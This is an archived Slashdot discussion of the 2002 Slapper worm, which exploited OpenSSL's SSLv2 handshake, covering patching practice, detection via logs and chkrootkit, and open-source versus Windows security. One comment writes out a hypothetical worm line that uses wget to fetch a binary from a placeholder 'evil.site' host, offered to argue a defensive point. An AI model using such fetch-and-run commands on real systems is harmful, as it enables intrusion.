This discussion has been archived.
No new comments can be posted.
New Linux Worm Found in the Wild
Related Links Top of the: day, week, month.
"In the long run, every program becomes rococo, and then rubble." -- Alan Perlis
"In the long run, every program becomes rococo, and then rubble." -- Alan Perlis
Finally... (Score:5, Funny)
Laugh, it's a joke
Bravo (Score:2)
Seems like the golves are coming off. Perhaps we need a sample of this worm to test its DNA and determine its origins
Re:Bravo (Score:2, Insightful)
Yes, just like in the case with Windows.
We're not really catching up (Score:5, Insightful)
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
Comment removed (Score:4, Interesting)
Re:We're not really catching up (Score:5, Insightful)
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Have you noticed how many pre-emptive security patches are made by Open Source developers? Where the announcements start with "someone pointed out this security flaw, and they were right, and we wanted to fix it before the exploits get created"? The "someone pointed out" part is a big deal. You can't get that with closed source vendorware, not proactively. As a result, security problems are frequently fixed long before they cause any problems at all.
Re:We're not really catching up (Score:2, Informative)
A few hopes... (Score:5, Funny)
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.
Re:A few hopes... (Score:3, Insightful)
It would be preferrable to let the security at the bank to know that your about to commit armed robbery so they can stop you. Of course there is a difference between white and black hat hackers.
A spacious analogy. (Score:2, Insightful)
Exploiting a vulnerability like this is similar to walking down the ally behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase it's security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
Retarded:A few hopes... (Score:3, Insightful)
Let me explain the process. You tell me if the analogy fits.
robber:
OpenSSL:
robber:
OpenSSL:
robber:
OpenSSL:
robber:
Re:A few hopes... (Score:5, Insightful)
I'm a bit sad that this has turned into an "open source is STILL better than Windows" thing (even though I think it is). When it comes to security, everybody in the software game has problems. The finger pointing is useless. The lessons of this attack are exactly the same as the lessons of previous attacks, whether on close or open code:
1. Software engineering needs to improve. The exploitable errors are patterns that keep on happening. As a programmer myself, I have made these mistakes. As a trade/guild/profession we need to take the time to learn these patterns and methods to avoid them. We (and I definitely include myself in this) are doing a lousy job.
2. Computer operations are doing a lousy job of keeping systems secure. This one is important, but less important than issue one, becuase system admins shouldn't have to patch systems constantly. That they have to is more a measure of the failures of software engineering than the failures of system admins. That said, until we programmers get our house in order, it does fall on admins to patch, patch, patch. This sounds simple, but it isn't. When you are talking about mission-critical systems, it is extremely dangerous to apply untested patches to production machines. So dangerous that good admins don't do it. They test patches on their test machines, and well run systems will go through applications regression testing for each set of patches. This takes time. Time during which the production systems run unpatched. Sometimes these patches come in stochastic bunches such that some patches go unapplied for months, simply because the patch came in after regression testing is too far along to start over. This leads to an ironic situation: The most critical systems to a business are often the most vulnerable. Judgement about whether a patch is for an issue is so critical that it should short-circuit regression testing is a difficult art. And what if the production systems doesn't work after the patch? Sure, you can back up; you might keep your deployments in a CVS-like archive so you can roll back in minutes, but what if even a few minutes is a few hundred thousand dollars, or a few million? How many times can you afford the risk?
One problem with many of my fellow Free Software advocates (note I said "many" and not "all") is that they have not worked in mission-critical production environments in multi-billion dollar enterprises. Many of my fellow Open Source fans have worked in environments where it is no big deal to bring the server down for ten or fifteen minutes. When those are the only kind of shops you have worked in, it is difficult to understand how serious and difficult these issues can be for some.
So don't turn this into a Windows vs. Open Source thing. We (Open Source folks) have to suck it up this time. So what? The issues are the same. Our track record is still better, but, in this situation, the past is meaningless. Where are we now? Unfortunately we are in the same place (and so is the closed world): We are still making the same mistakes in software development and asking the admins to clean up the mess. We are even blaming the admins for it, when it really is not their fault.
All of this was triggered by the previous poster's correct comments about audit and assessment. He/She's right, except that these measures are locking the stable door after the horse has bolted (except sometimes the horse hasn't yet bolted -- that's why you still do it). The problem is we software developers have made a stable door that you can walk away from with it unlocked. If we hadn't done that in the first place...
It is getting better. I'm seeing more books on programming to avoid security problems. We're learning. But there are a lot of us, and we aren't all getting the education.
Re:A few hopes... (Score:5, Informative)
So, in short, it's an old bug, it's been patched, and the only ones getting hit are people who haven't patched their openssl libraries.
Re:A few hopes... (Score:4, Insightful)
Any admin of either platform who uses best practices should be safe from most exploits. Shutdown unused services (and block the ports at your firewall if feasible), keep current on security patches, stay informed, and things should be manageable.
The catch is that just like there are clueless Windows admins, there are clueless Linux admins. And the clueless admins (for either platform) make their platform as a whole look bad.
Re:A few hopes... (Score:2, Insightful)
Re:A few hopes... (Score:3, Insightful)
While it incorporates profanity, and is therefore inherently rude, it isn't always meant or taken that way. There's a reason people right documentation, and it's not for finger exercise. No documentation I ever read was perfect, but most of it answers most questions I have about the application. I see the anagram used more commonly in the form of "DOH! I should have RTFM". It gets used pejoratively towards the people who are too freaking lazy to RTFM. You'd be amazed, for instance, how many people go on a newsgroup for an application, and ask questions that are addressed and answered in the first 25 displayed lines of the man page.
I answer a lot of questions on a newsgroup for a popular utility. On obvious RTFM questions, I always note the questioners name, domain, and writing style and cut them extra slack if they appear to be non-native speakers of English(technical translation is notoriously tricky). Otherwise, I simply copy/paste in the appropriate few lines of the man page, always including the headers to show where it came from, and introduced with something like "I could explain in my own words, but I think the author of the man page did a better job than I could."
Here on
In your troll against Linux culture: Somebody who's too lazy or stupid or illiterate to RTFM can't be a decent unix admin, and a sharp, rude reminder of that fact makes the good ones better, and makes the bad ones go back to windows.
Re:A few hopes... (Score:2)
Re:A few hopes... (Score:2)
Re:A few hopes... (Score:2, Interesting)
Most likely they don't give a shit or didn't even consider it. Not everybody is politically motivated. Some people actually see computers as nothing more than a tool, and don't really care if we live in a communist "free" world or a market-driven capitalist one, as long as their computer helps them do what they want to do. It's just a hunk of silicon, steel and plastic - it has no soul, no social conscience and its configuration is no reflection on themselves.
What a revolutionary idea!
Having said that remember that people writing worms are not likely to care much about the effect of their actions, whether it's denying you connectivity or canonizing Bill Gates.
Re:A few hopes... (Score:2)
Maybe these worms come from Microsoft themselves ?
Re: (Score:2)
Re:A few hopes... (Score:5, Funny)
> the OpenSSL people first, wait a month,
> then release the worm.
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)
Kind regards,
Dr Evil
Seriously though, I think I'm correct in saying that slapper exploits a flaw in OpenSSL patched well before the first slapper outbreak.
Re:A few hopes... (Score:2, Insightful)
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip) ...ONE BILLION DOLLARS!
Kind regards,
Dr Evil Don't forget to half-close your eyes
Re:A few hopes... (Score:3, Insightful)
Exploit *is* known (Score:2)
Also, while the article makes much of "thousands" of servers compromised, it ignores the fact that the number of compromised servers is (at least last I saw) in the five digits, and pretty much leveled off to very few new infections.
Similar Windows worms (like Code Red) infected hundreds of thousands of machines, and took much longer to level off. Yes, there are still a lot of computers out there, but UNIX admins are a lot more on top of their machines than Win admins, by these numbers.
Re:A few hopes... (Score:2)
I know of many examples, but it's minutes before I leave for work and I cannot cite them. But I'm hoping that you (and many others) are aware that many hackers who have found exploits in Microsoft products do inform Microsoft of the problem before releasing the exploit. Microsoft turn around and ignore them and do nothing until the hacker releases the exploit out into the open. With Microsoft, you don't get anything patched unless it makes a bad PR spin.
One such example of this was the Win32 message system allowing code to elevate its privs by sending commands to higher-priv'ed processes. It was posted to
Re: (Score:2)
use chkrootkit to see if you've gotten it (Score:5, Informative)
version 0.37 has been updated to find the slapper - JB
mirror (Score:2)
Re:mirror (Score:2, Informative)
here is my mirror of the source:
http://sage.che.pitt.edu/~harrold/tmp/ch
Re:mirror (Score:2)
Re:mirror (Score:2)
Re:use chkrootkit to see if you've gotten it (Score:2, Informative)
The most common MD5 sig for the 0.37 tarball seems to be: b0feebea67655daa440da92099dd5187
But for some reason I also see a different MD5 for what is supposed to also be 0.37:
edf50a9c8c6bf09b0a9147f2e6168826
BUT that is actually the signature from 0.35
So the bottom line is, try not to panic. Some mirrors are just a little out of sync. I am still a little nervous running this thing as root since I haven't seen anyone report that it's not a trojan itself. I guess some code review is in order.
Watch for trojans! Use your own binaries! (Score:3, Informative)
It does very little good to check for a rootkit when all the good GNU stuff in /bin has been trojaned...
-B
libsafe ! (Score:5, Informative)
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
Linux? (Score:2, Funny)
This shows that Linux+Apache is so widely accepted that it is a legitimate virus target. Enjoy it!
Re:Linux? (Score:2)
This is an apache-modssl-openssl-0.9.6.d-or-earlier-linux-x8
Re:Linux? (Score:3, Insightful)
Re:Linux? (Score:2)
Poor security. (Score:2, Funny)
Oh, what?
Open Source isn't perfect? Everything on Slashdot isn't true?
Maybe I really can leave my Mom's basement, then.
Re:Poor security. (Score:2)
Not quite a complete inverse, since the OpenSSL patch was out very quickly (at least from the OpenSSL people...dunno if all the distros have okayed it, though I know RH (the only one I checked) did some time ago).
Same mantra applies to Linux and MS sysadmins: (Score:5, Informative)
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
Re:Same mantra applies to Linux and MS sysadmins: (Score:5, Informative)
I would add the following:
3) Don't install a development environment (e.g. gcc, which is required for this worm to propogate) on a publically exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
If you must use a compiler on your web server, FFS run the publically accessible service in a chroot jail [tldp.org]!
Re:Same mantra applies to Linux and MS sysadmins: (Score:5, Insightful)
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
I keep seeing this comment, and every time I think how stupid it is. The compiler is not the security flaw. Given the number of comments like this, I fully expect the next version of this worm to have a "|| wget http://evil.site/worm-`uname -s`-`uname -m`" in place, and evil.site to have statically linked binaries. Then people will be saying "You don't need wget on a production webserver!" or some stupid shit like that. And it will move on to something else. They're already running code on your computer. You're already screwed.
(Isn't the first piece of the exploit written in assembler, as is typical for buffer exploits? Then they have to have targeted your platform specifically anyway. I just don't see why the compiler stage is necessary at all. They can just transfer the larger chunk of worm executable in the same way they transferred the source code.)
The real solution is to secure your system in the first place: disable services you aren't using. Patch ones you are. Given the month between the patch and the exploit, anyone following this practice will be unaffected.
Re:Same mantra applies to Linux and MS sysadmins: (Score:5, Insightful)
It's not stupid at all. You are correct in stating that the compiler is not the security flaw. However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to. Simply because they *could* find other means of implementing the worm doesn't mean that you should make this one easy. There are 2 goals here:
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
Re:Same mantra applies to Linux and MS sysadmins: (Score:2)
Or in Solaris sysadmin speak, or in redhat sysadmin speak. For instance, solaris tends to run NFS stuffs by default. And Redhat (probably a few other distro's too), tend to have a dozen or so unused services running.
Re:Same mantra applies to Linux and MS sysadmins: (Score:2)
Thank you, debian, for apt. Here's how I keep up to date with patches:
Apt is such a great idea. It's a better idea than RHN or whatever it is that mandrake is doing. Why? Because there are a ton of debian developers, each of them only having to watch a relatively small number of packages And when they keep up with patches, I do too, for almost no work.
This is the beauty of apt - it distributes patch management among a lot of people so that the load of any of them is relatively small. But then it allows all of us to leverage that work. It's distributed AND centralized all in one.
I'm not trying to start an distro war here. I'm just *SOOO* thankful for apt and debian. I'm trying to express gratitude. If it came out as flamebait, it was not intended.
Re:Same mantra applies to Linux and MS sysadmins: (Score:2)
New Mac Users Should Take Note, Too (Score:2)
Thankfully, Apple thought about their security model, so Mac OS X ships with Apache (known in its System Preferences as Personal Web Sharing) and many other common access features switched off by default.
Switching Personal Web Sharing on can make your Mac just as vulnerable to some, if not all of the effects of this worm (if this or any other worm contains x86-specific code for its payload, little to no effect may occur).
Apple's already addressed these vunerabilities in their recent Security Updates. You can install them from the Software Update system preference or download them from Apple.
Re:Same mantra applies to Linux and MS sysadmins: (Score:2)
That 1) is *extremely* important. If you're running RedHat you can use "chkconfig --list" to see what network-based services are running (all services actually).
For everything you don't know what is, don't hesitade to do a "chkconfig --del [service]". It's not realy deleted, just disabled.
Also, do a "rpm -qa" and "rpm -e [package]" for everything you don't know/need. It's better to have to spend some time fixing a problem that ypu caused yourself than fixing something that was done by an intruder.
The Worm (Score:4, Insightful)
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Re:The Worm (Score:2)
Re:The Worm (Score:5, Insightful)
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
Re:The Worm (Score:3, Interesting)
The Slashdot community, on the other hand, has for years appended a third comment: we're superior, we're Linux buffs, we're the best, and we apply patches.
Maybe the Slashdot community does. But let's face it -- in the face of this smug and elitist attitude comes the fact that thousands of Linux servers are being compromised because their administrators don't apply patches in a timely fashion. Remember, too, that when the Nimda et. al. worms hit, the Slashdot discussions included many regular readers who are also Windows administrators calmly pointing out that they had had no difficulties as they were patched long ago. Interesting, too, to note the (huge generalisation) often calm and mature reaction versus the yelling and screaming and chest-beating reaction of the "see-we-really-are-better-than-you-nyah-nyah-nyah
If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon.
Very valid point. So let me ask you (plural you here) -- when was the last time you spent an afternoon coding, testing, reviewing, and QCing a patch? Maybe you're one of the admirable group who actually does code patches in your spare time. But, more likely, I suspect, is that the vast majority of the readers of this message never have and never will submit a patch.
Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
And it was correct.
Re:The Worm (Score:2)
My statement:Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
Kiwimate:I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
And it was correct.
If I have misinterpreted CTRamsden's original intent of the statement that, [when faced with vulnerabilities, the open-source community responded with] "Windows still sux..." [paraphrasing, hopefully not too liberally], please forgive me, and I will ask for kiwimate to accept my thanks for pointing out a misinterpretation.
I have seen too many people equate the vocal non-coding, quick to criticise Microsoft Slashdot subgroup as characteristic of the entire open source movement. I think it's very important to remember and recognize that those people are out there -- but equally important to understand that others are out there who accept criticism as constructive.
Re:The Worm (Score:4, Informative)
One thing that would fix a whole lot of problems is for a security model to be installed that allowed root to delegate low-port and raw-protocol access to non-root accounts.
Granted these particular worms would not have cared, but there have been many remote root exploits that happened only because a daemon needed to be root to create a low port or perform raw protocol manipulation.
Questions: (Score:2, Interesting)
> I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.'...
Re:The Worm (Score:2)
I don't think I've *ever* heard anyone say that - certainly not at the local LUG meetings or amongst other fellow users in the area. Maybe it's a Michigan thing, but I can not ever recall hearing or reading comments like that.
Re:The Worm (Score:2)
This virus is not hurting Linux comunity. It just shows that there's too few holes for virus writers to be original. Last 3 viruses where using the same one hole. That's more promoting than demoting.
Well, for bad admins. I fell it's ok if they get infected. And for users, they don't have web server, but if they have, they should click Update icon sometimes.
Re:The Worm (Score:2)
Hardly. The inability to properly admin a system is biting them in the ass. The comments to Microsoft sucking when it comes to security still apply. When someone says that Linux is more secure than Windows, that is not saying it is perfect. Nobody in their right mind would say that any OS is totally secure. The difference is, it is a Linux community. People who find exploits should alert the community before releasing the information in the wild. The same applies to Windows, Microsoft should be alerted to the problem well before everyone else is. The difference is, the Open Source community will quickly patch it, Microsoft will do whatever they want to do.
There is nothing wrong with yelling at people about keeping their systems up to date. It is just bad practice to not keep up with patches. With Open Source, you can do that - with Windows, you can only do that if Microsoft provides you with patches. The OSS community has absolutely no say in how MS decides to handle vulnerabilities, but we do have a voice in our own community.
And if you think a worm or two means that now Linux is catching up to MS in the number of vulnerabilities, you are living in a dream world. Plagued? Please. At least the OSS community isn't delusional and says "there are no bugs".
Re:The Worm (Score:2)
A missed chance for some bad humor (Score:2, Redundant)
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
They should have replaced the code for the worm with code that pops up a window that says "Patch your server, you halfwit!"
CERT Advisory (Score:5, Informative)
what does it look like? (Score:5, Interesting)
your friendly neighborhood AC
Re:what does it look like? (Score:2, Informative)
Anyway I could be completely wrong, but since these hits were from Web servers I kind of suspect that these servers have not been patched.... God I hope that the log entries below don't indicate that I've been hit and damaged
Anyway the hits looked like this:
Re:what does it look like? (Score:3, Informative)
to detect the worm, simply do a ls -al in
you will find
Re:what does it look like? (Score:5, Informative)
[Sun Sep 22 12:45:51 2002] [error] mod_ssl: SSL handshake failed (server YOURSERVER:443, client aaa.bbb.ccc.ddd) (OpenSSL library error follows)
[Sun Sep 22 12:45:51 2002] [error] OpenSSL: error:1406B458:SSL routines:GET_CLIENT_MASTER_KEY:key arg too long
It's a distro problem, not a linux problem (Score:5, Insightful)
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
Re:It's a distro problem, not a linux problem (Score:2)
At some point you have to unless you want to run with a phony snakeoil cert.
How to test yourself (Score:5, Informative)
http://cert.uni-stuttgart.de/advisories/openssl
It will connect to your HTTPS server and check it. Unfortunatly, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Pbur
Re:How to test yourself (Score:2)
Re:How to test yourself (Score:3, Informative)
Funny (Score:2)
This time patch was month or so too fast for Slapper.B and C. Does this mean that Open Source gets better and better?
p.s. I hate lame unintuitive virus writers without imagination
comparison (Score:4, Insightful)
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page [dshield.org], around 25,000 windos hosts are still estimated as CodeRed infected, one year after the event.
According to news.com [com.com], at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is in not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, proof two things:
a) The Linux world is susceptible to the same generic diseases
b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
Re:comparison (Score:3, Informative)
That said, I would like to see a more in-depth analysis of the proportions of machines which have been hit and are infected. Also, we should bear in mind that the impact is much less on linux as Apache normally runs as a non-root user while IIS almost always runs as a system/admin user.
Re:comparison (Score:2)
You say that like it's a bad thing.
But doesn't that speak to the resilience of the Open Source approach? The fact that you can run an Apache site without enabling or even installing SSL is a strength. AFAIK (and ICBW) you can't do that with IIS.
Reasons (Score:2)
It's called "installed user base".
Re:Reasons (Score:3, Informative)
Even if you double the number to account for people running IIS on their home-desktop, you get nowhere near the "infected-to-unaffected" ratio.
Remember that all the "95% market share" babble is about desktop systems, while both Slapper and CodeRed are targetting server systems, where windos is one among many, and by far not the leader.
Re:Reasons (Score:5, Insightful)
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
Yup (Score:2)
Re:comparison (Score:4, Informative)
Why? Because of worm propagation history. Slapper is old news by now.
Compare this graph:
http://www.caida.org/analysis/security/code-red/c
It shows that CodeReds growth was exponential at the critical time, which measured only a few hours. Days have passed since Slapper hit the 10k mark, and we haven't seen any considerably higher estimates.
Old news (Score:2, Informative)
http://www.lwn.net/Articles/10026/
Thanks.
Re:Old news (Score:2)
The entry is as follows:
[Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23):
I've had a total of about 45 hits in the last 2 weeks, not like nimda at all in that regard (had to nuke my error logs like twice a week instead of once a month).
BWP
(BTW, I'm running FreeBSD and no SSL so it's not that big a deal for me.)
"Wget"ing its source (Score:5, Interesting)
Rather than simply having deleted the page, I wonder if it would have possible to replace this source code with something else that acted as an "antibody"?
Re:"Wget"ing its source (Score:3, Funny)
if-down eth0
Backwards (Score:3, Informative)
Perhaps I misread this idea tho?
A false sense of security (Score:4, Interesting)
On the other hand, the adminstrators of Windows machines, because they are facing a new worm every second day, try to stay uptodate with the latest news and patches. Most of them have aautomatic update wizards running on their machines which download new patches instantly.
Infact I would prefer such an instant update wizard for Linux as well, especially for the Linux running security critical applications, so that even if the system adminstrator is too lazy to check a news site, he will still come to know abot the threat.
And because it will be running on linux, it will do what its supposed to do, not "God knows What and Gates knows what" as is the case with windows update wizard.
Re:A false sense of security (Score:3, Insightful)
Good post man.
sysadmins? (Score:4, Insightful)
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
SysAdmin Announcement: Thread Closed (Score:2, Funny)
Time to chroot apache (Score:2, Informative)
Slapper author got caught! (Score:2, Interesting)
Sent: Tuesday, September 24, 2002 9:54 AM
To: firewalls@isc.org
Subject: Slapper worm redux;
Those folks relying upon security through obscurity might well wish to get
on the ball and fully patch-up;
September 23 VNUNET.COM.
A suspect has been arrested on suspicion of authoring the Slapper worm.
But although the threat of the worm seems to have been short-lived, a new
variant is already set to take up where its predecessor left off. Although
the ISC's 'most attacked ports' chart no longer features Slapper in its
Top 10 a variant, Slapper.B, has been spotted in the wild. Slapper.B has
several subtle differences, but is for the most part an updated version of
its predecessor. Both worms attempt to exploit a known vulnerability in
the Secure Sockets Layer 2.0 (SSLv2) handshake process. The two variants
also carry the same payload, a password-protected backdoor and denial of
service (DoS) capabilities. ISS's Morgan said that with the new variant on
the loose his company had calculated that about 10,000 servers were
probably now infected, and that the network was probably going to be used
for DoS attacks. He added that it was unlikely the original author created
the second worm. "It was significant that source code for the original
Slapper was distributed within the computer underground immediately after
the worm was detected in the wild," he said. Source:
http://www.vnunet.com/News/1135274
--
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
Slappers. (Score:4, Informative)
A linguistic note for Americans and other aliens....
"Slapper" is an EnglishEnglish term for a woman with an easily exploited hole....
On Onions and Carrots (Score:4, Insightful)
If anyone takes the care to look at incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note specially the attacks. In less than 12 hours after Nimda's appearence I had more then 340000 Nimda "visits" on the network I surpervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Re:oh no! (Score:5, Funny)
I wonder how Windows must look then. Yikes!
Re:oh no! (Score:3, Insightful)
I think you're being *way* too paranoid.
What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects, causing buffer overruns and worms?
Almost nil.
Even if they are, the maintainers share the blame for not reviewing them properly.
Re:oh no! (Score:2)
{look of utter fear from the thought that someone would say something like that and be serious.}
Re:Response Time (Score:2)
Err. To compile the webserver. Unless I'm missing something
Kinda interesting (Score:2)
I wonder if he meant that operating systems will inherently have remote security holes? I'm not so sure that's true, if you're using few servers, simpler ones, and ones not written in C.
Re:Source Code? (Score:3, Informative)
Not good enough, I don't think.
I'm seeing remote ports 2140:2144 being used to attempt to connect to port 443.
So, I'm denying port 443 incoming and monitoring all outgoing unaccounted for udp. (Yes, we were infected.)